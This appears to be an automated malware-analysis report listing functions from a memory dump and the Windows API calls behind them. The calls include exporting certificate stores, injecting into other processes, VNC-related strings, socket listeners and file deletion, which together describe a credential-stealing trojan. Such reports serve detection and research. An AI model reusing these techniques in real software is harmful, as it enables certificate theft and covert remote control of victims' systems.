closesocket.WS2_32 ref: 00156D4B
WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,001715FC,?,?,?), ref: 00156D52

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00150C35, Relevance: 10.9, APIs: 6, Instructions: 197

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00150C9B
memcpy.MSVCRT ref: 00150CB5
VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00150CC8
memset.MSVCRT ref: 00150D1F
memcpy.MSVCRT ref: 00150D33
VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00150E22

Part of subcall function 00150FC3: LoadLibraryA.KERNEL32 ref: 00151013

Part of subcall function 00151149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00151158

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016FA0A, Relevance: 10.8, APIs: 6, Instructions: 161

APIs

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FB0C

Part of subcall function 0016FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,0016FB19,?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FE4D
Part of subcall function 0016FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,0016FB19,?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FE84

Part of subcall function 0017046D: EnterCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 0017047A
Part of subcall function 0017046D: LeaveCriticalSection.KERNEL32(001830F4,?,?,0014E3BD,00000000,?,?,00000001), ref: 00170488

LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,0014D004,00000000), ref: 0016FB4D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0016FB5C
SetEvent.KERNEL32 ref: 0016FB6C
GetExitCodeThread.KERNEL32(?,?), ref: 0016FB80
CloseHandle.KERNEL32 ref: 0016FB96

Part of subcall function 00155BB5: EnterCriticalSection.KERNEL32(00C01F3C,00C01F30,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001,?,00164E98,?,00000001), ref: 00155BBE
Part of subcall function 00155BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00155BF7
Part of subcall function 00155BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,0015E48F,00000000,00000000,00000002), ref: 00155C16
Part of subcall function 00155BB5: GetLastError.KERNEL32(?,000000FF,0015E48F,00000000,00000000,00000002,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001), ref: 00155C20
Part of subcall function 00155BB5: TerminateThread.KERNEL32 ref: 00155C28
Part of subcall function 00155BB5: CloseHandle.KERNEL32 ref: 00155C2F
Part of subcall function 00155BB5: LeaveCriticalSection.KERNEL32(00C01F3C,?,00000001,0015E48F,00000000,0015E1B7,00000000,?,00000000,?,00000001,?,00164E98,?,00000001), ref: 00155C44
Part of subcall function 00155BB5: ResumeThread.KERNEL32 ref: 00155C5D

Part of subcall function 001701B2: memcmp.MSVCRT ref: 001701CB
Part of subcall function 001701B2: memcmp.MSVCRT ref: 00170227
Part of subcall function 001701B2: memcmp.MSVCRT ref: 0017028D

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 00164CA0: memcpy.MSVCRT ref: 00164CC6
Part of subcall function 00164CA0: memset.MSVCRT ref: 00164D69

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014A150, Relevance: 10.8, APIs: 7, Instructions: 122

APIs

memcpy.MSVCRT ref: 0014A18C
memcpy.MSVCRT ref: 0014A1A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 0014A1D3
memcpy.MSVCRT ref: 0014A209
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 0014A239
memcpy.MSVCRT ref: 0014A26F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 0014A29F

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001524AA, Relevance: 10.8, APIs: 6, Instructions: 91

APIs

CertOpenSystemStoreW.CRYPT32(00000000), ref: 001524BC
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 001524DA
CertEnumCertificatesInStore.CRYPT32(?,?,?,00000000), ref: 001524E7
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000), ref: 0015251B

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000,00000004,?,?,?,00000000), ref: 0015254D

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0015258C: GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 001525BA
Part of subcall function 0015258C: GetSystemTime.KERNEL32(?), ref: 0015260D
Part of subcall function 0015258C: CharLowerW.USER32(?), ref: 0015265D
Part of subcall function 0015258C: PathRenameExtensionW.SHLWAPI(?,?), ref: 0015268D

CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 0015257C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00172D0B, Relevance: 10.7, APIs: 6, Instructions: 64

APIs

accept.WS2_32(?,0000EA60), ref: 00172D2C
WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00172D3E

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0014D163), ref: 00172D95

Part of subcall function 00172917: WSACreateEvent.WS2_32(00000000,?,00172C15,?,00000000,?,00172CD1,?,?,?,?,00000000), ref: 0017292D
Part of subcall function 00172917: WSAEventSelect.WS2_32(?,?,00172CD1), ref: 00172943
Part of subcall function 00172917: WSACloseEvent.WS2_32(?), ref: 00172957

Part of subcall function 00172855: getsockopt.WS2_32(0000EA60,0000FFFF,00002004,?,?), ref: 0017288F
Part of subcall function 00172855: memset.MSVCRT ref: 001728A3

WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0014D163,?), ref: 00172D6F
shutdown.WS2_32(?,00000002), ref: 00172D87
closesocket.WS2_32 ref: 00172D8E

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156378, Relevance: 10.6, APIs: 7, Instructions: 146

APIs

Part of subcall function 0015568C: TlsSetValue.KERNEL32(00000001,0015E1BD), ref: 00155699

Part of subcall function 0016BEE3: CreateMutexW.KERNEL32(00182974,00000000,?), ref: 0016BF05

GetCurrentThread.KERNEL32 ref: 001563A4
SetThreadPriority.KERNEL32 ref: 001563AB

Part of subcall function 00164B8D: WaitForSingleObject.KERNEL32(00000000,0015E1D7), ref: 00164B95

memset.MSVCRT ref: 001563ED
lstrlenA.KERNEL32(00000050), ref: 00156404

Part of subcall function 00155D25: memset.MSVCRT ref: 00155D35

Part of subcall function 00160A9A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00160AD8
Part of subcall function 00160A9A: PathRemoveFileSpecW.SHLWAPI(?), ref: 00160B26
Part of subcall function 00160A9A: FindFirstFileW.KERNEL32(?,?), ref: 00160B93
Part of subcall function 00160A9A: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00160BEA
Part of subcall function 00160A9A: SetLastError.KERNEL32(00000057,?), ref: 00160C5B
Part of subcall function 00160A9A: CloseHandle.KERNEL32 ref: 00160C95
Part of subcall function 00160A9A: FindNextFileW.KERNEL32(?,?), ref: 00160CC9
Part of subcall function 00160A9A: FindClose.KERNEL32 ref: 00160CF3

memset.MSVCRT ref: 001564CA
memcpy.MSVCRT ref: 001564DA

Part of subcall function 00156240: lstrlenA.KERNEL32(?,?), ref: 00156279
Part of subcall function 00156240: CreateMutexW.KERNEL32(00182974,00000001,?), ref: 001562D1
Part of subcall function 00156240: GetLastError.KERNEL32(?,?,?,?), ref: 001562E1
Part of subcall function 00156240: CloseHandle.KERNEL32 ref: 001562EF
Part of subcall function 00156240: memcpy.MSVCRT ref: 00156319
Part of subcall function 00156240: memcpy.MSVCRT ref: 0015632D

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

WaitForSingleObject.KERNEL32(00007530), ref: 00156504

Part of subcall function 00152FB7: ReleaseMutex.KERNEL32 ref: 00152FBB
Part of subcall function 00152FB7: CloseHandle.KERNEL32 ref: 00152FC2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015DEBB, Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 27

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 0015DEC9
GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0015DED5
SetLastError.KERNEL32(00000001,001642C8,00182954,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 0015DEED

Strings

shell32.dll, xrefs: 0015DEC8
SHGetKnownFolderPath, xrefs: 0015DED3

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001579B9, Relevance: 10.6, APIs: 7, Instructions: 126

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 001579F0
WSASetLastError.WS2_32(00000008), ref: 001579FF
memcpy.MSVCRT ref: 00157A1C
memcpy.MSVCRT ref: 00157A2E
WSASetLastError.WS2_32(00000008,?,?,?), ref: 00157A98
WSAGetLastError.WS2_32(?,?,?), ref: 00157AB4

Part of subcall function 00157CDE: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 00157D2F
Part of subcall function 00157CDE: RegisterWaitForSingleObject.KERNEL32(?,?,00157B1D,?,000000FF,00000004), ref: 00157D43

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?), ref: 00157ADD

Part of subcall function 0014F9C5: memcpy.MSVCRT ref: 0014F9DA
Part of subcall function 0014F9C5: SetEvent.KERNEL32 ref: 0014F9EA

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60

APIs

memset.MSVCRT ref: 00155229
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00155261
memcpy.MSVCRT ref: 0015527C
CloseHandle.KERNEL32(?), ref: 00155291
CloseHandle.KERNEL32(?), ref: 00155297

Strings

D, xrefs: 00155232

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00159895, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49

APIs

CloseHandle.KERNEL32 ref: 0015989F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 001598AD

Part of subcall function 0014E6AF: GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 0014E6BC
Part of subcall function 0014E6AF: CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 0014E6DC

memcpy.MSVCRT ref: 001598E8
lstrcpyW.KERNEL32(?,?), ref: 001598FD

Part of subcall function 0016B9D8: PathIsDirectoryW.SHLWAPI(?), ref: 0016BA0E
Part of subcall function 0016B9D8: CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 0016BA30
Part of subcall function 0016B9D8: GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 0016BA76
Part of subcall function 0016B9D8: CloseHandle.KERNEL32 ref: 0016BA95
Part of subcall function 0016B9D8: PathRemoveFileSpecW.SHLWAPI ref: 0016BAA2

CloseHandle.KERNEL32 ref: 00159916

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 001598B3

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014A5B2, Relevance: 10.5, APIs: 4, Strings: 1, Instructions: 293

APIs

Part of subcall function 0016BEE3: CreateMutexW.KERNEL32(00182974,00000000,?), ref: 0016BF05

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

Part of subcall function 00151B16: CreateFileW.KERNEL32(00C01EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00151B2F
Part of subcall function 00151B16: GetFileSizeEx.KERNEL32(?,?), ref: 00151B42
Part of subcall function 00151B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00151B68
Part of subcall function 00151B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00151B80
Part of subcall function 00151B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00151B9E
Part of subcall function 00151B16: CloseHandle.KERNEL32 ref: 00151BA7

memset.MSVCRT ref: 0014A757
memcpy.MSVCRT ref: 0014A780

Part of subcall function 0016D95F: GetSystemTime.KERNEL32(?), ref: 0016D969

Part of subcall function 001569C9: HeapAlloc.KERNEL32(00000000,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?,?,?), ref: 001569F3
Part of subcall function 001569C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00174E9D,00149851,?,?,00174FB1,?,?,?,?,?,?), ref: 00156A06

Part of subcall function 00173993: memcpy.MSVCRT ref: 00173AA4

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0014A885
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0014A8A1

Part of subcall function 0014E348: CloseHandle.KERNEL32 ref: 0014E354

Part of subcall function 00152FB7: ReleaseMutex.KERNEL32 ref: 00152FBB
Part of subcall function 00152FB7: CloseHandle.KERNEL32 ref: 00152FC2

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0014A46D: memset.MSVCRT ref: 0014A47C
Part of subcall function 0014A46D: memset.MSVCRT ref: 0014A4BF
Part of subcall function 0014A46D: memset.MSVCRT ref: 0014A4F5

Part of subcall function 00151149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00151158

Part of subcall function 00150C35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00150C9B
Part of subcall function 00150C35: memcpy.MSVCRT ref: 00150CB5
Part of subcall function 00150C35: VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00150CC8
Part of subcall function 00150C35: memset.MSVCRT ref: 00150D1F
Part of subcall function 00150C35: memcpy.MSVCRT ref: 00150D33
Part of subcall function 00150C35: VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00150E22

Part of subcall function 00173B9E: memcmp.MSVCRT ref: 00173C47

Part of subcall function 00151BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00151BC6
Part of subcall function 00151BB5: CloseHandle.KERNEL32 ref: 00151BD5

Strings

vnc, xrefs: 0014A601 0014A60E

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00175419, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 46

APIs

LoadLibraryW.KERNEL32(urlmon.dll), ref: 00175420
GetProcAddress.KERNEL32(?,ObtainUserAgentString), ref: 00175436
FreeLibrary.KERNEL32 ref: 00175481

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Strings

urlmon.dll, xrefs: 0017541B
ObtainUserAgentString, xrefs: 0017542E

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015DEFC, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 40

APIs

EnterCriticalSection.KERNEL32(00183510,?,00000000,?,00164659,?,001649A5,?,?,00000001), ref: 0015DF10
LeaveCriticalSection.KERNEL32(00183510,?,00000000,?,00164659,?,001649A5,?,?,00000001), ref: 0015DF38

Part of subcall function 0015DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 0015DEC9
Part of subcall function 0015DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0015DED5
Part of subcall function 0015DEBB: SetLastError.KERNEL32(00000001,001642C8,00182954,?,00182DB4,00000000,00000006,?,0016BBC2,00182DB4,?,?,00000000), ref: 0015DEED

IsWow64Process.KERNEL32(000000FF,?), ref: 0015DF61

Strings

IsWow64Process, xrefs: 0015DF44
kernel32.dll, xrefs: 0015DF49

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00156997, Relevance: 9.6, APIs: 1, Instructions: 9

APIs

Part of subcall function 0015692C: EnterCriticalSection.KERNEL32(00183510,00000024,0015699F,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 0015693C
Part of subcall function 0015692C: LeaveCriticalSection.KERNEL32(00183510,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 00156966

HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00163C8C, Relevance: 9.6, APIs: 5, Instructions: 138

APIs

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

FindFirstFileW.KERNEL32(?,?), ref: 00163CCB
SetLastError.KERNEL32(?,?,?,?), ref: 00163DF6

Part of subcall function 00163E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00163E98
Part of subcall function 00163E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00163EB7

FindNextFileW.KERNEL32(?,?), ref: 00163DC0
GetLastError.KERNEL32(?,?), ref: 00163DD9
FindClose.KERNEL32 ref: 00163DEF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0014DE64, Relevance: 9.5, APIs: 6, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,0014E138,?,?,?,?,?,00000009,00000000), ref: 0014DE7E
LeaveCriticalSection.KERNEL32 ref: 0014DF65

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

memcpy.MSVCRT ref: 0014DEEF
memcpy.MSVCRT ref: 0014DF13
memcpy.MSVCRT ref: 0014DF2A
memcpy.MSVCRT ref: 0014DF4A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001730A2, Relevance: 9.5, APIs: 5, Instructions: 71

APIs

Part of subcall function 00172755: EnterCriticalSection.KERNEL32(00183510,?,001730AF,?,?,00000000), ref: 00172765
Part of subcall function 00172755: LeaveCriticalSection.KERNEL32(00183510,?,00000000), ref: 0017278F

socket.WS2_32(?,00000002,00000000), ref: 001730BC
WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 001730EF
WSAGetLastError.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 001730F6

Part of subcall function 001569B0: HeapAlloc.KERNEL32(00000008,?,?,0015519B,?,?,?,?,001646A1,?,001649A5,?,?,00000001), ref: 001569C1

WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,?,?,00000000,00000000), ref: 0017312A

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

closesocket.WS2_32 ref: 0017313A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001644FB, Relevance: 9.5, APIs: 5, Instructions: 59

APIs

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

FindFirstFileW.KERNEL32(?,?), ref: 0016452C

Part of subcall function 0014E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0014E82F
Part of subcall function 0014E826: DeleteFileW.KERNEL32(?), ref: 0014E836

FindNextFileW.KERNEL32(?,?), ref: 0016457E
FindClose.KERNEL32 ref: 00164589
SetFileAttributesW.KERNEL32(?,00000080), ref: 00164595
RemoveDirectoryW.KERNEL32(?), ref: 0016459C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00164A6B, Relevance: 9.4, APIs: 5, Instructions: 109

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164A89

Part of subcall function 00164159: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00164188
Part of subcall function 00164159: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 001641C7
Part of subcall function 00164159: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 001641EE

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164AC4
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B04
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B27

Part of subcall function 001645AE: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 001645D1
Part of subcall function 001645AE: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 001645E9
Part of subcall function 001645AE: DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00164604

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00164B77

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016B70A, Relevance: 9.4, APIs: 5, Instructions: 89

APIs

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

CreateDirectoryW.KERNEL32(?,00000000), ref: 0016B783
SetFileAttributesW.KERNEL32(?), ref: 0016B7A2
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 0016B7B9
GetLastError.KERNEL32(?,00000002,?,?), ref: 0016B7C6
CloseHandle.KERNEL32 ref: 0016B7FF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00155C67, Relevance: 9.1, APIs: 5, Instructions: 49

APIs

EnterCriticalSection.KERNEL32(00C01F3C,?,?,00000001,00164EA8,?,?,00000001), ref: 00155C70
LeaveCriticalSection.KERNEL32(00C01F3C,?,00000001,00164EA8,?,?,00000001), ref: 00155C7A
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00155CA0
EnterCriticalSection.KERNEL32(00C01F3C,?,00000001,00164EA8,?,?,00000001), ref: 00155CB8
LeaveCriticalSection.KERNEL32(00C01F3C,?,00000001,00164EA8,?,?,00000001), ref: 00155CC2

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001549D7, Relevance: 9.1, APIs: 6, Instructions: 145

APIs

memset.MSVCRT ref: 00154A18

Part of subcall function 00173D5A: memcpy.MSVCRT ref: 00173D94

CharLowerW.USER32 ref: 00154A5C
CharUpperW.USER32(?,?,00000001), ref: 00154A6D
CharLowerW.USER32 ref: 00154A81
CharUpperW.USER32(?,00000001), ref: 00154A8B
memcmp.MSVCRT ref: 00154AA0

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00157B1D, Relevance: 9.1, APIs: 6, Instructions: 141

APIs

Part of subcall function 0015568C: TlsSetValue.KERNEL32(00000001,0015E1BD), ref: 00155699

Part of subcall function 0014F99C: ResetEvent.KERNEL32 ref: 0014F9B8

WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00157B63
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00157B6D
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00157C76
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00157C7F
UnregisterWait.KERNEL32(?), ref: 00157CA4
TlsSetValue.KERNEL32(00000000), ref: 00157CCF

Part of subcall function 0014F9C5: memcpy.MSVCRT ref: 0014F9DA
Part of subcall function 0014F9C5: SetEvent.KERNEL32 ref: 0014F9EA

Part of subcall function 0014F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0014F82D

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016BC3E, Relevance: 9.1, APIs: 5, Instructions: 172

APIs

memset.MSVCRT ref: 0016BC73
GetComputerNameW.KERNEL32(?,?), ref: 0016BCA7
GetVersionExW.KERNEL32(?), ref: 0016BCD0
memset.MSVCRT ref: 0016BCEF

Part of subcall function 00160D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00160D60

Part of subcall function 00160D19: RegFlushKey.ADVAPI32 ref: 00160D29
Part of subcall function 00160D19: RegCloseKey.ADVAPI32 ref: 00160D31

Part of subcall function 00149A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00149ACA
Part of subcall function 00149A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00149AEF

memset.MSVCRT ref: 0016BDF4

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 00149A2A: CryptDestroyHash.ADVAPI32 ref: 00149A42
Part of subcall function 00149A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00149A53

Part of subcall function 00149B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00149B41

Part of subcall function 00160FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,0016BD4B,?), ref: 00160FF2

Part of subcall function 00160E64: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00160EBF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015D694, Relevance: 9.1, APIs: 6, Instructions: 79

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000004,0015D7B9,00000000,?,?,?,?,?,?,0015C499,?,00000000), ref: 0015D69E
HeapCreate.KERNEL32(00040001,00000000,00000000), ref: 0015D6DB
HeapAlloc.KERNEL32(?,00000000,0000000B,?,?,?,?,00000004,0015D7B9,00000000), ref: 0015D6F8
HeapFree.KERNEL32(?,00000000,?,?,00000000,0000000B,?,?,?,?,00000004,0015D7B9,00000000), ref: 0015D720
memcpy.MSVCRT ref: 0015D730

Part of subcall function 0015599B: EnterCriticalSection.KERNEL32(001827DC,00000000,0014D9CE,00C01E90,?,?,?,00151992,?,?,?,?,001648EB,?,?,00000000), ref: 001559A7
Part of subcall function 0015599B: LeaveCriticalSection.KERNEL32(001827DC,?,?,?,00151992,?,?,?,?,001648EB,?,?,00000000), ref: 001559B7

Part of subcall function 001509C2: GetCurrentThreadId.KERNEL32 ref: 001509D3
Part of subcall function 001509C2: memcpy.MSVCRT ref: 00150B42
Part of subcall function 001509C2: memset.MSVCRT ref: 00150BA8
Part of subcall function 001509C2: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00150BBD
Part of subcall function 001509C2: GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00150BC7

